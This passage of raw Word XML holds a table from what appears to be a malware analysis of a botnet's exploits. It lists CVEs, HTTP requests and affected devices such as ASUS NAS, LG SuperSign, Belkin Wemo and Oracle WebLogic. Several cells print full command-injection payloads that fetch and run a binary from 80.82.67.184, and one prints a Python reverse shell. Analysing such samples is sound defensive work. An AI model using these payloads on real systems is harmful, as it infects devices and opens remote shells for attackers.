              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dreambox_setup_connection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7516F1B1" w14:textId="693C2FD7" w:rsidR="00972FBC" w:rsidRDefault="00E53C6D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Dreambox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> devices such as CCTV systems</w:t>
            </w:r>
            <w:r w:rsidR="0037456E">
              <w:t xml:space="preserve"> and video recorders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="7D489EDC" w14:textId="0C4313F5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E1AE0E2" w14:textId="17629C25" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="002E1CBF" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2018_6961</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18323DB5" w14:textId="6135A2BF" w:rsidR="00972FBC" w:rsidRDefault="00AF6C2D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 Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B8E82C" w14:textId="77777777" w:rsidR="00A12254" w:rsidRDefault="002B3291" w:rsidP="00A12254">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="14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291">
              <w:t>POST /scripts/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002B3291">
              <w:t>ajaxPortal.lua</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B3291">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B9D443" w14:textId="77777777" w:rsidR="00092B5A" w:rsidRDefault="00092B5A" w:rsidP="00A12254">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="14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names analyzed in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> as non-stripped binary:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A76091E" w14:textId="556A7B8A" w:rsidR="00092B5A" w:rsidRPr="00A12254" w:rsidRDefault="00092B5A" w:rsidP="00A12254">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="14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mwarescan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="0065068F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0065068F">
              <w:t>vmscan_scanner_kill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0065068F">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0065068F">
              <w:t>vmware_setup_connection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04614CD7" w14:textId="1523989B" w:rsidR="00972FBC" w:rsidRDefault="00273CB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CB4">
              <w:t>VMware NSX SD-WAN Edge &lt; 3.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="54BD813F" w14:textId="23CD7560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B63D5A9" w14:textId="7A663EEC" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="002E1CBF" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2018_7841</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2008A769" w14:textId="27C661F8" w:rsidR="00972FBC" w:rsidRDefault="0049508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Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="070B3A05" w14:textId="5018651B" w:rsidR="00972FBC" w:rsidRDefault="00F54C3C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C3C">
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F54C3C">
              <w:t>smartdomuspad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F54C3C">
              <w:t>/modules/reporting/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F54C3C">
              <w:t>track_import_export.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F54C3C">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C1CB03B" w14:textId="2CF156B4" w:rsidR="00972FBC" w:rsidRDefault="005C397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F">
              <w:t xml:space="preserve">Schneider Electric </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C397F">
              <w:t>U.Motion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005C397F">
              <w:t xml:space="preserve"> Builder 1.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="6F5DD0AC" w14:textId="13A17E6F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3687395" w14:textId="4FFD9253" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="002E1CBF" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2018_11510_11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7926E275" w14:textId="54DC30DC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63CA9FB5" w14:textId="7080AAC3" w:rsidR="00972FBC" w:rsidRDefault="005A2C7D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7D">
              <w:t>POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>; ./richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357C283D" w14:textId="345B40A8" w:rsidR="00972FBC" w:rsidRDefault="005A2C7D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C7D">
              <w:t>ASUSTOR ADM 3.1.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>0.RFQ</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005A2C7D">
              <w:t>3 NAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="2BE49359" w14:textId="772083AC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9A9F273" w14:textId="7A208588" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00C14AA2" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2018_17173</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C6F50D" w14:textId="1E4B5133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36B3D44E" w14:textId="6058913F" w:rsidR="00972FBC" w:rsidRDefault="00C7082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0821">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C70821">
              <w:t>qsrserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C70821">
              <w:t>/device/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C70821">
              <w:t>getThumbnail?sourceUri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C70821">
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidR="009773D8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard -O /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t xml:space="preserve">/f; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t xml:space="preserve"> 777 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>/f; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>/f; &gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>f ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:t>&amp;targetUri=/tmp/thumb/test.jpg&amp;mediaType=image&amp;targetWid</w:t>
            </w:r>
            <w:r w:rsidR="009773D8" w:rsidRPr="009773D8">
              <w:lastRenderedPageBreak/>
              <w:t>th=400&amp;targetHeight=400&amp;scaleType=crop&amp;=1537275717150 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="356863AF" w14:textId="29D50E82" w:rsidR="00972FBC" w:rsidRDefault="0049246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46B">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">LG </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049246B">
              <w:t>SuperSign</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049246B">
              <w:t xml:space="preserve"> CMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="1DD12F61" w14:textId="00C4F058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C17D84F" w14:textId="7D62FF10" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00C14AA2" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2019_2725</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69D23CFE" w14:textId="4A76CCDF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0B977E5" w14:textId="77777777" w:rsidR="001641D6" w:rsidRDefault="00F00DA1" w:rsidP="00CE20B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DA1">
              <w:t>POST /_async/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00DA1">
              <w:t>AsyncResponseServiceHttps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00DA1">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidR="001641D6">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="417AC480" w14:textId="7F55AF78" w:rsidR="00CE20B1" w:rsidRPr="00CE20B1" w:rsidRDefault="00393868" w:rsidP="00CE20B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names analyzed in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> as non-stripped binary: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>oraclescan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>oraclescan_scanner_kill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>oraclescan_setup_connection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E450330" w14:textId="3E417CFE" w:rsidR="00972FBC" w:rsidRDefault="003D5E6F" w:rsidP="00CE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E6F">
              <w:t xml:space="preserve">Oracle WebLogic </w:t>
            </w:r>
            <w:r w:rsidR="00F2286D" w:rsidRPr="00F2286D">
              <w:t>10.3.6.0.0 / 12.1.3.0.0</w:t>
            </w:r>
            <w:r w:rsidR="00F2286D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003D5E6F">
              <w:t>Server</w:t>
            </w:r>
            <w:r>
              <w:t>s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="7E2B7C84" w14:textId="58980A26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033D7F1" w14:textId="3863BF76" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00C14AA2" w:rsidP="00B06445">
            <w:r>
              <w:t>ASUS</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidR="00552304">
              <w:t>DSL</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidR="00552304">
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00552304">
              <w:t>E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FEFFBB0" w14:textId="4A9E5B75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44975F30" w14:textId="1E7F7823" w:rsidR="00A36FA5" w:rsidRDefault="00B43432" w:rsidP="0029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432">
              <w:t>GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&amp;next_page=Main_Analysis_Content.asp&amp;next_host=www.target.com&amp;group_id=&amp;modified=0&amp;action_mode=+Refresh+&amp;action_script=&amp;action_wait=&amp;first_time=&amp;applyFlag=1&amp;preferred_lang=EN&amp;firmver=1.1.2.3_345-g987b580&amp;cmdMethod=ping&amp;destIP=%60ucd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B43432">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B43432">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B43432">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B43432">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B43432">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B43432">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B43432">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B43432">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B43432">
              <w:t>/richard%60&amp;pingCNT=5 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCA449C" w14:textId="7647A4AB" w:rsidR="00972FBC" w:rsidRDefault="001C6E3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us DSL N12E</w:t>
            </w:r>
            <w:r w:rsidR="00210D06">
              <w:t xml:space="preserve"> Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="30EDF0E1" w14:textId="79B6ECEF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E337A2" w14:textId="6DB11F98" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00DF6CDC" w:rsidP="00B06445">
            <w:r>
              <w:t>BELKIN_WEMO_RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CDA183E" w14:textId="3827662E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2DA4A804" w14:textId="1E1D90C9" w:rsidR="00F518E0" w:rsidRDefault="00F518E0" w:rsidP="00EC7B5B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="13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E0">
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>upnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>/control/basicevent1 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55E0ECEC" w14:textId="46B87671" w:rsidR="00972FBC" w:rsidRDefault="00F518E0" w:rsidP="00EC7B5B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="13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E0">
              <w:t>&lt;?xml version="1.0" encoding="utf-8"?&gt; &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>s:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>xmlns:s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt; &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>s:Body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>u:SetSmartDevInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>xmlns:u</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>="urn:Belkin:service:basicevent:1"&gt; &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>SmartDevURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>&gt;cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard -O /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t xml:space="preserve">/ECHOBOT; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t xml:space="preserve"> +x /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>/ECHOBOT; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>/ECHOBOT&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>SmartDevURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>u:SetSmartDevInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>s:Body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>s:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F518E0">
              <w:t>&gt;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79AC8BF9" w14:textId="6A9645DF" w:rsidR="00972FBC" w:rsidRDefault="00C76127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kin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wemo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000B15B8">
              <w:t>smart devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="7D8036E8" w14:textId="6B82D919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1EB343C" w14:textId="60FF0F3A" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="0041582A" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2013_4863</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073FAB28" w14:textId="5A87C1E9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2D784BB9" w14:textId="72B26291" w:rsidR="00D916DE" w:rsidRDefault="00D51594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594">
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D51594">
              <w:t>upnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D51594">
              <w:t>/control/hag HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3095CA57" w14:textId="75CF1BB4" w:rsidR="00D51594" w:rsidRDefault="00AB1DB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DBA">
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>s:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t xml:space="preserve"> s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>xmlns:s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>="http://schemas.xmlsoap.org/soap/envelope/"&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>s:Body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>&gt; &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>u:RunLua</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t xml:space="preserve"> xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"&gt; &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>DeviceNum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
